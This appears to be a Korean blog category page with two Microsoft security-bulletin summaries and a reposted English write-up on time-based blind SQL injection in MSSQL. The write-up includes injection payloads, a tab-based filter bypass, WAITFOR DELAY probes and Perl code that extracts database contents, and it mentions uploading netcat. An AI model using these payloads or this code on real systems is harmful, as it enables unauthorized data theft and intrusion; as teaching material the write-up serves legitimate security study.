'SQL Server'에 해당되는 글 11건

  1. 2014.08.13 2014년 8월 MS 정기 보안업데이트
  2. 2012.04.12 2012년 4월 MS 정기 보안업데이트
  3. 2012.03.20 Time Based Blind SQL Injection
2014.08.13 19:40

2014년 8월 MS 정기 보안업데이트

[MS14-043] Windows Media Center 취약점으로 인한 원격코드 실행 문제


영향

  • 공격자가 영향 받는 시스템에 원격코드를 실행

설명

  • 사용자가 Windows Media Center 리소스를 실행하는 특수하게 조작된 Microsoft Office 파일을 열 때 원격코드 실행을 허용할 수 있는 취약점이 존재
  • 관련취약점 :
    • CSyncBasePlayer User-After-Free 취약점 – (CVE-2014-4060)
  • 영향 : 원격 코드실행
  • 중요도 : 긴급


해당시스템

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 

 

[MS14-044] SQL Server의 취약점으로 인한 권한 상승 문제


영향

  • 공격자가 영향 받는 시스템에 대한 권한을 상승


설명

  • 사용자가 클라이언트측 스크립트를 Internet Explorer의 사용자 인스턴스에 주입하는 특수하게 조작된 웹사이트를 방문하는 경우 권한 상승을 허용할 수 있는 취약점
  • 관련취약점 :
    • SQL Master Data Services XSS 취약점 – (CVE-2014-1820)
    • SQL Server 스택 오버런 취약점 - (CVE-2014-4061)
  • 영향 : 권한 상승
  • 중요도 : 중요


□ 해당시스템


□ 해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 

 

[MS14-045] 커널 모드 드라이버의 취약점으로 인한 권한 상승 문제


영향

  • 공격자가 영향 받는 시스템에 대한 권한을 상승


설명

  • 공격자가 시스템에 로그온하여 특수하게 조작한 응용프로그램을 실행할 경우 권한 상승이 허용될 수 있는 취약점
  • 관련취약점 :
    • Win32k 권한 상승 취약점 – (CVE-2014-0318)
    • 글꼴 이중 페치 취약점 - (CVE-2014-1819)
    • Windows 커널 풀 할당 취약점 - (CVE-2014-4064)
  • 영향 : 권한 상승
  • 중요도 : 중요


해당시스템

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 

 

[MS14-046] .NET Framework의 취약점으로 인한 보안기능 우회 문제


영향

  • 공격자가 영향 받는 시스템의 보안 기능을 우회


설명

  • 사용자가 특수하게 조작된 웹 사이트를 방문할 경우 보안 기능 우회를 허용할 수 있는 취약점
  • 관련취약점 :
    • .NET ASLR 우회 취약점 – (CVE-2014-4062)
  • 영향 : 보안기능 우회
  • 중요도 : 중요


해당시스템


해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 

 

[MS14-047] LRPC의 취약점으로 인한 보안기능 우회 문제


영향

  • 공격자가 영향 받는 시스템의 보안기능을 우회


설명

  • 보안기능 우회를 필요로 하는 원격코드 실행 취약점이 있는 경우, 본 취약점과 결합하면 보안기능을 우회할 수 있음
  • 관련취약점 :
    • LRPC ASLR 우회 취약점 – (CVE-2014-0316)
  • 영향 : 보안기능 우회
  • 중요도 : 중요


해당시스템

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 

 

[MS14-048] OneNote의 취약점으로 인한 원격코드 실행 문제


영향

  • 공격자가 영향 받는 시스템에 원격코드 실행


설명

  • 취약한 OneNote 버전에서 사용자가 특수하게 조작된 파일을 열 경우 원격 코드 실행이 허용될 수 있는 취약점
  • 관련취약점 :
    • OneNote 원격코드실행 취약점  (CVE-2014-2815)
  • 영향 : 원격코드 실행
  • 중요도 : 중요


해당시스템

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 

 

[MS14-049] Windows Installer 서비스의 취약점으로 인한 권한 상승 문제


영향

  • 공격자가 영향 받는 시스템에 대한 권한 상승


설명

  • 공격자가 이전에 설치된 응용 프로그램을 복구하려고 하는 특수하게 조작된 응용프로그램을 실행할 경우 권한 상승을 허용할 수 있는 취약점이 존재
  • 관련취약점 :
    • Windows Installer 복구 취약점  (CVE-2014-1814)
  • 영향 : 권한 상승
  • 중요도 : 중요


해당시스템


해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 

 

[MS14-050] Microsoft SharePoint Server의 취약점으로 인한 권한 상승 문제


영향

  • 공격자가 영향 받는 시스템에 대한 권한 상승


설명

  • 본 취약점 악용에 성공한 인증된 공격자는 현재 SharePoint 사이트의 사용자 컨텍스트에서 임의의 자바스크립트를 실행하기 위해 특수하게 조작된 앱 사용 가능
  • 관련취약점 :
    • SharePoint 페이지 콘텐츠 취약점  (CVE-2014-2816)
  • 영향 : 권한 상승
  • 중요도 : 중요


해당시스템


해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

 


[MS14-051] Internet Explorer 누적 보안 업데이트


영향

  • 공격자가 영향 받는 시스템에 원격코드 실행


설명

  • 사용자는 Internet Explorer를 사용하여 특수하게 제작된 웹페이지를 열람할 경우, 원격코드가 실행될 수 있는 취약점이 존재
  • 관련취약점 :
    • Internet Exploer 메모리 손상 취약점 – (CVE-2014-2774, CVE-2014-2784, CVE-2014-2796, CVE-2014-2808, CVE-2014-0810, CVE-2014-2811, CVE-2014-2818, CVE-2014-2820, CVE-2014-2821, CVE-2014-2822, CVE-2014-2823, CVE-2014-2824, CVE-2014-2825, CVE-2014-2826, CVE-2014-2827, CVE-2014-4050, CVE-2014-4051, CVE-2014-4052, CVE-2014-4055, CVE-2014-4056, CVE-2014-4057, CVE-2014-4058, CVE-2014-4063, CVE-2014-4067)
  • 영향 : 원격코드 실행
  • 중요도 : 긴급


해당시스템


해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용



Trackback 0 Comment 0
2012.04.12 09:14

2012년 4월 MS 정기 보안업데이트

[MS12-023] Internet Explorer 누적 보안업데이트


영향

  • 공격자가 영향 받는 시스템에 대해 사용자와 동일한 권한 획득 

설명

  • 사용자가 Internet Explorer를 사용하여 특수하게 조작된 웹 페이지를 열람할 경우, 원격코드가
    실행될 수 있는 취약점이 존재
  • 관련취약점 :
    - 인쇄 기능 원격 코드 실행 취약점(CVE-2012-0168)
    - JScript9 원격 코드 실행 취약점(CVE-2012-0169)
    - OnReadyStateChange 원격 코드 실행 취약점(CVE-2012-0170)
    - SelectAll 원격 코드 실행 취약점(CVE-2012-0171)
    - VML 스타일 원격 코드 실행 취약점(CVE-2012-0172)
  • 영향 : 원격코드 실행
  • 중요도 : 긴급

해당시스템

  • 영향 받는 소프트웨어
Windows XP 서비스 팩3

Internet Explorer 6

Internet Explorer 7

Internet Explorer 8

Windows XP Professional 64-bit 서비스 팩2

Internet Explorer 6

Internet Explorer 7

Internet Explorer 8

Windows Server 2003 서비스 팩2

Internet Explorer 6

Internet Explorer 7

Internet Explorer 8

Windows Server 2003 64-bit 서비스 팩2

Internet Explorer 6

Internet Explorer 7

Internet Explorer 8

Windows Server 2003 Itanium 서비스 팩2

Internet Explorer 6

Internet Explorer 7

Internet Explorer 8

Windows Vista 서비스 팩2

Internet Explorer 7

Internet Explorer 8

Internet Explorer 9

Windows Vista 64-bit 서비스 팩2

Internet Explorer 7

Internet Explorer 8

Internet Explorer 9

Windows Server 2008 서비스 팩2**

Internet Explorer 7

Internet Explorer 8

Internet Explorer 9

Windows Server 2008 64-bit 서비스 팩2**

Internet Explorer 7

Internet Explorer 8

Internet Explorer 9

Windows Server 2008 Itanium 서비스 팩2

Internet Explorer 7

Windows 7 서비스 팩0, 1

Internet Explorer 8

Internet Explorer 9

Windows 7 64-bit 서비스 팩0, 1

Internet Explorer 8

Internet Explorer 9

Windows Server 2008 R2 64-bit 서비스 팩0, 1**

Internet Explorer 8

Internet Explorer 9

Windows Server 2008 R2 Itanium 서비스 팩0, 1**

Internet Explorer 8

  ※ **표시된 윈도우를 서버코어(Server Core)옵션으로 설치한 경우, 해당 취약점에 영향을 받지 않음

 

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

참조사이트


[MS12-024] 윈도우에서 발생하는 취약점으로 인한 원격코드 실행 문제

영향

  • 공격자가 영향 받는 시스템에 대해 완전한 권한 획득

설명

  • 공격자가 특수하게 조작되고 서명된 실행파일을 실행 및 설치할 경우, 원격코드가 실행될 수 있는 취약점이 존재
  • 관련취약점 :
    - WinVerifyTrust 서명 유효성 검사 취약점(CVE-2012-0151)
  • 영향 : 원격코드 실행
  • 중요도 : 긴급

해당시스템

  • 영향 받는 소프트웨어
    - Windows XP 서비스 팩3
    - Windows XP Professional 64-bit 서비스 팩2
    - Windows Server 2003 서비스 팩2
    - Windows Server 2003 64-bit 서비스 팩2
    - Windows Server 2003 Itanium 서비스 팩2
    - Windows Vista 서비스 팩2
    - Windows Vista 64-bit 서비스 팩2
    Windows Server 2008 서비스 팩2
    - Windows Server 2008 64-bit 서비스 팩2
    - Windows 7 서비스 팩0, 1
    - Windows 7 64-bit 서비스 팩0, 1
    - Windows Server 2008 R2 64-bit 서비스 팩0, 1
    - Windows Server 2008 R2 Itanium 서비스 팩0, 1
    - Windows Server 2008 Itanium 서비스 팩2

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

참조사이트


[MS12-025] .NET Framework에서 발생하는 취약점으로 인한 원격코드 실행 문제

영향

  • 공격자가 영향 받는 시스템에 대해 완전한 권한 획득

설명

  • 사용자가 XBAP(XAML 브라우저 응용 프로그램)을 실행할 수 있는 웹 브라우저를 사용하여 특수하게 조작된 웹 페이지를 열람할 경우, 원격코드가 실행될 수 있는 취약점이 존재
  • 관련취약점 :
     - .NET Framework 매개 변수 유효성 검사 취약점(CVE-2012-0163)
  • 영향 : 원격코드 실행
  • 중요도 : 긴급

해당시스템

  • 영향 받는 소프트웨어

Windows XP 서비스 팩3

Microsoft .NET Framework 1.0 서비스 팩3

Microsoft .NET Framework 1.1 서비스 팩1

Microsoft .NET Framework 2.0 서비스 팩2

Microsoft .NET Framework 4

Windows XP Professional 64-bit 서비스 팩2

Windows Server 2003 서비스 팩2

Windows Server 2003 64-bit 서비스 팩2

Windows Server 2003 서비스 팩2 Itanium

Windows Vista 서비스 팩 2

Windows Vista 64-bit 서비스 팩2

Windows Server 2008 서비스 팩2

Windows Server 2008 64-bit 서비스 팩2

Windows Server 2008 Itanium 서비스 팩2

Microsoft .NET Framework 1.1 서비스 팩1

Microsoft .NET Framework 2.0 서비스 팩2

Microsoft .NET Framework 4

Windows 7 서비스 팩0, 1

Windows 7 64-bit 서비스 팩0, 1

Microsoft .NET Framework 3.5.1

Microsoft .NET Framework 4

Windows Server 2008 R2 64-bit 서비스 팩0, 1

Windows Server 2008 R2 Itanium 서비스 팩0, 1

Microsoft .NET Framework 3.5.1

Microsoft .NET Framework 4

 

  • 영향 받지 않는 소프트웨어
    - Microsoft .NET Framework 3.0 서비스 팩 2
    - Microsoft .NET Framework 3.5 서비스 팩 1

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

참조사이트

[MS12-026] Forefront UAG(Unified Access Gateway)에서 발생하는 취약점으로 인한 정보유출 문제

영향

  • 공격자가 영향 받는 시스템에 대한 정보유출

설명

  •  공격자가 UAG서버에 특수하게 조작된 쿼리를 요청할 경우, 정보가 유출될 수 있는 취약점이 존재
  • 관련취약점 :
    - UAG 블라인드 HTTP 리디렉션 취약점(CVE-2012-0146)
    - UAG 기본 웹 사이트에 대한 필터링되지 않은 액세스 취약점(CVE-2012-0147)
  • 영향 : 정보유출
  • 중요도 : 중요

해당시스템

  • 영향 받는 소프트웨어
    - Microsoft Forefront Unified Access Gateway 2010 서비스 팩 1
    - Microsoft Forefront Unified Access Gateway 2010 서비스 팩 1 업데이트 1
  • 영향 받지 않는 소프트웨어
    - Microsoft Forefront Unified Access Gateway 2010
    - Microsoft Forefront Unified Access Gateway 2010 업데이트 1
    - Microsoft Forefront Unified Access Gateway 2010 업데이트 2

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

참조사이트 

 

[MS12-027] 윈도우 공용 컨트롤에서 발생하는 취약점으로 인한 원격코드 실행 문제


영향

  • 공격자가 영향 받는 시스템에 대해 완전한 권한 획득

설명

  • 사용자가 특수하게 조작된 콘텐츠가 포함된 웹 페이지를 열람할 경우, 원격코드가 실행될 수 있는 취약점이 존재
  • 관련취약점 :
    - MSCOMCTL.OCX RCE 취약점(CVE-2012-0158)
  • 영향 : 원격코드 실행
  • 중요도 : 긴급

해당시스템

  • 영향 받는 소프트웨어

Office 소프트웨어

Microsoft Office 2003 서비스 팩 3

Microsoft Office 2003 Web Components 서비스 팩 3

Microsoft Office 2007 서비스 팩 2, 3

Microsoft Office 2010 32비트

Microsoft Office 2010 32비트 서비스 팩 1

SQL Server 소프트웨어

Microsoft SQL Server 2000 Analysis Services 서비스 팩 4

Microsoft SQL Server 2000 서비스 팩 4

SQL Server 구성 요소

고급 서비스가 포함된 Microsoft SQL Server 2005 Express Edition 서비스 팩 4

Microsoft SQL Server 2005 32비트 서비스 팩 4

Microsoft SQL Server 2005 Itanium 서비스 팩 4

Microsoft SQL Server 2005 64비트 서비스 팩 4

Microsoft SQL Server 2008 32비트 서비스 팩 2, 3

Microsoft SQL Server 2008 64비트 서비스 팩 2, 3

Microsoft SQL Server 2008 Itanium 서비스 팩 2, 3

Microsoft SQL Server 2008 R2 32비트

Microsoft SQL Server 2008 R2 64비트

Microsoft SQL Server 2008 R2 Itanium

기타 MS소프트웨어

Microsoft BizTalk Server 2002 서비스 팩 1

Microsoft Commerce Server 2002 서비스 팩 4

Microsoft Commerce Server 2007 서비스 팩 2

Microsoft Commerce Server 2009

Microsoft Commerce Server 2009 R2

MS 개발자 도구 및 소프트웨어

Microsoft Visual FoxPro 8.0 서비스 팩 1, 2

Visual Basic 6.0 Runtime

 

  • 영향 받지 않는 소프트웨어
    - Microsoft Office 2010 64비트 서비스 팩 0, 1
    - Microsoft Office Web Apps
    - Microsoft SQL Server 2000 Itanium Edition 서비스 팩 4
    - Microsoft SQL Server 2000 Reporting Services 서비스 팩 2
    Microsoft Windows Server 2003 서비스 팩 2의 Microsoft SQL Server 2000 Desktop Engine(MSDE)
    - Microsoft SQL Server 2000 Desktop Engine(MSDE 2000) 서비스 팩 4
    - Microsoft SQL Server 2005 Express Edition 서비스 팩 4
    - SQL Server Management Studio Express(SSMSE) 2005
    - Microsoft SQL Server 2008 Management Studio
    - Microsoft BizTalk Server 2004
    - Microsoft BizTalk Server 2006
    - Microsoft BizTalk Server 2009
    - Microsoft Data Engine(MSDE) 1.0 서비스팩 0, 4

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

참조사이트 


[MS12-028] MS Office에서 발생하는 취약점으로 인한 원격코드 실행 문제

영향

  • 공격자가 영향 받는 시스템에 대해 완전한 권한 획득

설명

  • 사용자가 특수하게 조작된 Works 파일을 열람할 경우, 원격코드가 실행될 수 있는 취약점이 존재
  • 관련취약점 :
    - Office WPS 변환기 힙 오버플로 취약점(CVE-2012-0177)
  • 영향 : 원격코드 실행
  • 중요도 : 중요

해당시스템

  • 영향 받는 소프트웨어
    - Microsoft Office 2007 서비스 팩 2
    - Microsoft Works 9
    - Microsoft Works 6–9 파일 변환기
  • 영향 받지 않는 소프트웨어
    - Microsoft Office 2003 서비스 팩 3
    - Microsoft Office 2007 서비스 팩 3
    - Microsoft Office 2010 32비트 서비스 팩 0, 1
    - Microsoft Office 2010 64비트 서비스 팩 0, 1
    - Microsoft Office 2008 for Mac
    - Open XML File Format Converter for Mac
    - Microsoft Office for Mac 2011
    - Microsoft Office for Mac 2011
    Word, Excel, PowerPoint 2007 파일 형식 서비스 팩 2용 Microsoft Office 호환 기능 팩
    - Microsoft Office 호환 기능 팩 서비스 팩 3

해결책

  • 해당 시스템에 대한 마이크로소프트사의 취약점 패치 적용

참조사이트


Trackback 0 Comment 0
2012.03.20 18:54

Time Based Blind SQL Injection

I am not going to talk about Blind SQL injection since this is fully documented across different web sites, check References section at the end of this blog.

The reason I am writing this blog is for two main purposes:

1. Bug Hunting: To explain the process I followed to discover a "not-easy-to-find" vulnerability.

2. Exploit form scratch: To release a tool to extract data from the Data base via SQL Blind injection.


Bug Hunting:

When I put the famous single quote in front of the form I got the well known message:

Microsoft OLE DB Provider for SQL Server
 error '80040e14'

Unclosed quotation mark before the character string '''.

Then, without any extra parsing to above error response, I started inserting the common ways of exploitation:
  • '+OR+'1'='1
  • '+OR+1=1--
  • '+having+1=1--
  • '+union (select 1 from table)--
  • etc
The first thing I noticed is that the spaces were being filtered but as explained in my previous SQLi post, you can easily bypass that by injecting a TAB (%09) instead of a space.

After bypassing the space restriction, I always got syntax errors like:


Incorrect syntax near the keyword 'OR'.

Incorrect syntax near the keyword 'having'.

Incorrect syntax near the keyword 'union'.

Which was telling me two things: first, my SQLi was being executed but with syntax errors and second that I was not in the common scenario where the injection is being placed after the WHERE clause:

select ..... where user='aa' OR 1=1

After a lot of testing without success, I just assumed I cannot inject any SQL command after the single quote, so, then I started inserting other chars like: ',' and... I got below error:

Procedure or function get_Etiqueta has too many arguments specified.

Then I realized we were dealing with a Stored Procedure which in fact was injectable, this could explain the restrictions and therefore the syntax error messages. Then I decide a new way of injection (below is the value inserted in the vulnerable POST parameter):

';<my_own_sql_query>;--

Above injection is saying, complete the current requestexecute my own SQL commandand comment out the rest of the string.

When executed using fake table and field:

'; select xxx from table tabla'--

I did not get any error, just redirected back to main Login page. Then I realized we were not getting any responses from the DB and therefore in a Blind SQL Injection scenario, so I decided to use the famousWAITEFOR DELAY command from MSSQL to validate if my attempts were being executed in the server side, so I sent:

0';WAITFOR%09DELAY%09'0:0:15'

And voila!!! The browser waits 15 seconds to get the response from the Server!! Now we have identified the BUG, so, how can we exploit it? Let's go to the next section.

Exploit from Scratch.

I decided to use sqlmap or sqlninja to dump the database or to get a remote shell, but none works for me, just for one reason, those tools have their own methods to bypass filters, but unfortunately, the TAB (%09) trick is not handled by them and therefore all my injections were being rejected. It was a mess to adjust their tools so I decided to keep improving my own tools and come up with Regalado-blindSQL.pl perl script.

The main features of the tool are as follows:
  • Create a SQL procedure to assign the SQL query result to a variable.
  • The tool, iterates to each char from the result and compare it with the ASCII table to identify its value, if the value is found, the response will be delay by 10 seconds, this way the tool can identify if a char was identified.
  • Write output to a log file.
  • Implements netcat upload feature from Sqlninja tool, just changing the bypass technique and the Libraries used to established the SSL Connection.
Below the script to identify the chars in the response:

1. my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
2. " if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
3. " else waitfor delay '0:0:1'";

At Line 1, we create the variable @s and assign it the result of the $sql being executed.
At Line 2, the first char (denoted by $j) is subtracted from the string acquired and compare with the first value in the ASCII Table ($i).
This loops will repeat until the char is found and then $j will be incremented to move to the next char in the string.

The main loop to get the string, parse each char and compare it with ASCII TABLE is here:

while (length ($dato) > 0){ #Keep searching until no more data found
$dato ="";
for $j (1 .. 100){#This is the maximum text length to retrieve, although the tool knows when the string is complete 
print "\t\nIdentificando char number: $j\n";
open (FILE,">>", "output.txt") or die $!; #Creating log file

for $i (32 .. 126){ #ASCII TABLE Printable chars only
$g = $i;
print "\t\nValidating if the letter exist: " . chr($i) . "\n";
my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
" if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
" else waitfor delay '0:0:1'";

send_request($prefix . $cmd . $postfix); #Send HTTPS request
if (check_time() eq "encontrado") { #validates the response to know if the car was detected.
last;
}
}

if ($r eq "encontrado"){
print "\t\nGetting Contenido ... " . $dato . "\n";
print FILE "Getting Contenido ...: " . $dato . "\n";
close(FILE);
}
else{ #No encontro ningun caracter y esto puede significr el fin de la palabra identificada

print "\t\n*********END OF CONTENT EXTRACTTION ... Moving to next one.\n";
last;
}
}
print "\t\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi******************\n";
print FILE "\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi****************\n";

$sql = $sql . " and $fi not like '". $dato . "'"; #preparing the next string to retrieve.
}
print "\t\nEND OF EXECUTION check output.txt log file.\n\n";

Finally, the tools is able to identify:
  • DB Name
  • DB User
  • DB Version
  • List of tables from current DB
  • List of fields from specific table
  • Content of tables
  • Upload netcat via sqlninja methods.
IMPORTANT: The tool DOES NOT FIND vulnerabilities, it assumes you already found one and need to leverage the exploitation. Being this said, you might need to change the $prefix and $postfix variables within the tool to adjust based on the way your application is exploitable.

References:
https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OWASP-DV-005%29


출처 : danuxx.blogspot.com

Trackback 0 Comment 0